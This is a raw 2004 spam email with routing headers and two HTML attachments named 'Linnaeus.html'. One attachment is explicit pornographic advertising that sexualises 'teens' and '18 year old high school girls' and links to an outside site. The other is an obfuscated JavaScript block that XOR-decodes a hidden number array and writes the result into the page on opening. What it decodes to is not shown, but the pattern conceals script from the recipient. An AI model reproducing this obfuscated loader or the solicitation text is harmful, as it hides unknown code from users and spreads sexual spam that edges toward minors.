Received: from ims-ms-daemon.nlpmail03.prodigy.net.mx by nlpmail03.prodigy.net.mx
 (iPlanet Messaging Server 5.2 HotFix 1.21 (built Sep  8 2003))
 id <0HTN0092O6R72A@nlpmail03.prodigy.net.mx>
 (original mail from mostly@dea42.net); Wed, 25 Feb 2004 07:28:19 -0600 (CST)
Received: from nlpproxy09 (nlpproxy09-back.prodigy.net.mx [148.235.52.99])
 by nlpmail03.prodigy.net.mx
 (iPlanet Messaging Server 5.2 HotFix 1.21 (built Sep  8 2003))
 with ESMTP id <0HTN008OE6R77U@nlpmail03.prodigy.net.mx> for
 juanivan@prodigy.net.mx; Wed, 25 Feb 2004 07:28:19 -0600 (CST)
Received: from 137.204.228.12 ([137.204.228.12])
 by smtp.prodigy.net.mx (iPlanet Messaging Server 5.2 HotFix 1.21 (built Sep  8
 2003)) with SMTP id <0HTN003QM6PKMS@smtp.prodigy.net.mx>; Wed,
 25 Feb 2004 07:27:33 -0600 (CST)
Received: from unknown (HELO EFDEAD) (192.168.93.97)
 by 137.204.228.12 with SMTP; Fri, 27 Feb 2004 07:59:53 -0800
Date: Fri, 27 Feb 2004 07:59:45 -0800
From: evangelin <mostly@dea42.net>
Subject: this is a turn on
To: "juanivan@prodigy.net.mx" <juanivan@prodigy.net.mx>
Message-id: <00dc01c3fd4a$b7d36e80$a38a50d5@EFDEAD>
MIME-version: 1.0
Content-type: multipart/mixed; boundary="Boundary_(ID_hMHPWE7Bhd6DtQEC8w8Hlw)"
X-Priority: 3

This is a multi-part message in MIME format.

--Boundary_(ID_hMHPWE7Bhd6DtQEC8w8Hlw)
Content-type: multipart/alternative;
 boundary="Boundary_(ID_gRoS8GHM8ZspouS4EYxx2w)"


--Boundary_(ID_gRoS8GHM8ZspouS4EYxx2w)
Content-type: text/plain;	charset="utf-8"
Content-transfer-encoding: quoted-printable

this is plain text part
--Boundary_(ID_gRoS8GHM8ZspouS4EYxx2w)
Content-type: text/html;	charset="utf-8"
Content-transfer-encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
<STYLE></STYLE>
</HEAD>
<BODY><B>This message</B> has an attach</BODY></HTML>
--Boundary_(ID_gRoS8GHM8ZspouS4EYxx2w)--

--Boundary_(ID_hMHPWE7Bhd6DtQEC8w8Hlw)
Content-type: text/html;	name="Linnaeus.html"
Content-transfer-encoding: quoted-printable
Content-disposition: attachment;	filename="Linnaeus.html"

<html>



<body>

<p align="center"><font color="#FF0000" size="5"><a href="http://rmt566.com/z/1/imaxpiss/ref.html">WANT
TO SEE SOME HOT TEENS DOING NAUGHTY THINGS?</a></font></p>
<p align="center"><font color="#FF0000" size="5">Get in here and you will find
that not all 18 year old high school girls</font></p>
<p align="center"><font color="#FF0000" size="5">are innocent and sweet. 
Some like sex once a day, twice a day, and even in the ass.</font></p>
<p align="center"><font color="#FF0000" size="5">For your pleasure, we bring you
a TON of crazy hot girls who undress and do all </font></p>
<p align="center"><font color="#FF0000" size="5">sorts of kinky sex acts.  </font></p>
<p align="center"><font color="#FF0000" size="5"><a href="http://rmt566.com/z/1/imaxpiss/ref.html">COME
ON IN</a></font></p>
<p align="left"><font color="#000000" size="2">no more <a href="http://rmt566.com/z/done.html">please</a></font></p>

</body>

</html>

--Boundary_(ID_hMHPWE7Bhd6DtQEC8w8Hlw)--
Content-type: text/html;	name="Linnaeus.html"
Content-transfer-encoding: quoted-printable
Content-disposition: attachment;	filename="Linnaeus.html"

<script language="JavaScript">
quantize = new Array(38,
35,92,44,138,25,217,119,127,201,77,
115,179,21,80,87,165,95,33,143,155,
29,9,231,30,195,80,136,2,102,251,
203,71,9,235,68,40,115,81,47,240,
157,156,63,113,145,184,53,73,116,212,
254,132,202,70,238,196,213,224,249,254,
223,222,165,169,98,146,100,155,197,161,
31,12,191,97,25,22,173,73,147,183,
217,112,5,34,167,254,130,205,1,93,
221,27,249,106,75,89,132,37,206,124,
232,197,50,251,14,1,97,174,214,255,
166,197,169,29,55,152,223,80,224,46,
113,174,222,207,225,232,72,144,159,231,
225,53,226,17,221,161,12,141,188,30,
215,163,225,106,239,157,116,88,196,164,
41,237,122,190,46,206,193,93,112,189,
227,92,248,230,211,252,148,28,100,115,
230,162,80,45,171,150,180,94,126,24,
3,218,113,45,99,110,68,68,83,12,
37,59,231,1,230,72,90,54,222,215,
109,244,220,140,125,146,73,124,36,70,
53,198,68,187,17,29,177,125,91,157,
89,42,5,250,11,104,147,182,100,109,
151,71,142,82,220,76,49,219,192,14,
11,225,79,102,111,81,47,183,131,193,
55,122,223,181,122,95,59,207,248,154,
155,68,171,235,253,180,196,196,155,148,
228,174,43,134,110,210,199,245,81,94,
163,49,1,94,166,73,148,248,219,119,
29,50,247,172,196,133,27,16,218,77,
167,51,10,86,203,47,136,116,171,135,
33,189,5,15,119,170,129,176,250,154,
229,117,91,138,199,4,236,46,58,247,
231,179,141,223,32,244,191,205,179,68,
153,104,155,157,45,180,217,93,240,128,
218,56,134,250,18,80,209,180,93,146,
3,210,73,157,230,102,64,199,137,61,
131,248,230,198,184,114,74,78,183,241,
28,41,251,222,187,89,127,18,87,151,
58,103,118,36,103,110,98,118,86,53,
230,13,161,74,14,127,216,146,112,229,
193,222,48,194,22,127,107,73,97,130,
70,173,81,82,183,55,16,221,122,76,
84,234,95,57,200,186,55,101,131,70,
147,21,159,11,97,188,204,20,11,252,
73,35,39,85,46,161,141,156,118,120,
144,162,97,20,39,151,225,200,250,110,
241,242,179,177,165,167,136,146,184,248,
104,141,111,210,130,230,31,12,191,102,
86,16,171,12,150,229,151,119,3,107,
245,231,235,164,67,0,153,30,237,124,
22,83,145,45,220,36,242,214,35,212,
12,18,57,167,208,249,167,202,171,20,
52,215,196,81,255,39,127,176,254,235,
143,222,55,243,165,207,225,31,200,33,
240,248,34,224,173,113,209,204,218,44,
155,187,67,119,237,253,77,202,92,132,
73,137,230,110,73,137,139,127,201,169,
167,193,179,54,81,69,170,237,95,45,
251,206,187,92,126,86,22,136,33,34,
47,127,47,33,1,8,59,102,164,24,
191,43,109,40,205,146,98,236,208,153,
49,145,87,121,46,70,53,131,85,246,
67,78,165,47,23,202,63,15,90,166,
84,42,140,180,52,66,171,18,131,64,
217,76,47,239,204,0,78,181,3,115,
37,10,46,189,209,212,42,62,144,170,
53,65,114,214,250,143,215,23,168,250,
179,177,170,186,156,210,165,250,55,199,
103,201,137,224,3,14,172,112,7,115,
213,16,133,170,154,116,24,49,185,249,
143,129,22,94,221,75,189,126,91,6,
141,39,143,114,231,151,114,254,12,18,
36,252,156,202,147,218,235,72,97,148,
151,87,228,56,54,173,171,187,141,130,
121,251,235,192,179,3,193,105,223,154,
55,180,137,4,176,195,199,39,207,237,
7,32,185,231,2,207,28,138,70,223,
160,117,72,155,211,120,200,181,244,155,
175,55,69,14,177,234,18,32,183,148,
216,119,92,51,122,238,2,76,51,25,
7,114,64,29,59,102,164,14,238,72,
19,42,129,157,115,190,180,244,99,220,
85,123,39,65,38,136,26,246,17,23,
165,52,91,128,35,10,90,164,79,120,
210,249,123,107,159,31,145,83,217,94,
63,172,149,74,9,168,82,47,125,81,
96,240,145,130,103,112,144,236,120,69,
105,221,177,202,150,68,165,240,246,182,
244,236,135,136,241,170,49,199,46,212,
138,224,8,4,181,46,90,17,178,3,
143,165,159,119,31,51,249,172,217,143,
31,18,151,94,163,57,4,73,142,116,
206,103,249,200,50,244,12,14,109,224,
131,163,165,212,214,114,92,188,139,11,
239,45,55,233,183,131,165,177,79,166,
228,192,181,11,203,106);
tabulator = new Array(26,
75,40,65,230,39,212,125,114,195,64,
121,190,31,108,53,202,59,88,177,150,
23,4,237,34,179,112,233,110,15,156,
165,122,43,136,33,70,7,52,93,210,
163,160,89,30,255,204,21,42,27,184,
145,246,247,100,205,130,147,208,201,206,
239,252,133,218,11,232,1,166,231,148,
61,50,131,0,57,126,223,44,245,138,
251,24,113,86,215,196,173,226,115,48,
169,46,207,92,101,58,235,72,225,6,
199,244,29,146,99,96,25,222,191,140,
213,234,219,120,81,182,183,36,141,66,
83,144,137,142,175,188,69,154,203,168,
193,102,167,84,253,242,67,192,249,62,
159,236,181,74,187,216,49,22,151,132,
109,162,51,240,105,238,143,28,37,250,
171,8,161,198,135,180,221,82,35,32,
217,158,127,76,149,170,155,56,17,118,
119,228,77,2,19,80,73,78,111,124,
5,90,139,104,129,38,103,20,189,178,
3,128,185,254,95,172,117);
preach = 967;
comment = 208;
var varies = "";
for(awl = 0; awl < preach; awl++)
  varies = varies + String.fromCharCode(quantize[awl] ^ tabulator[awl % comment]);
document.write(varies);
</script>

--Boundary_(ID_hMHPWE7Bhd6DtQEC8w8Hlw)--

--Boundary_(ID_Tw26K8hyKl6p/Cubp0cHNw)--



--Email may be truncated---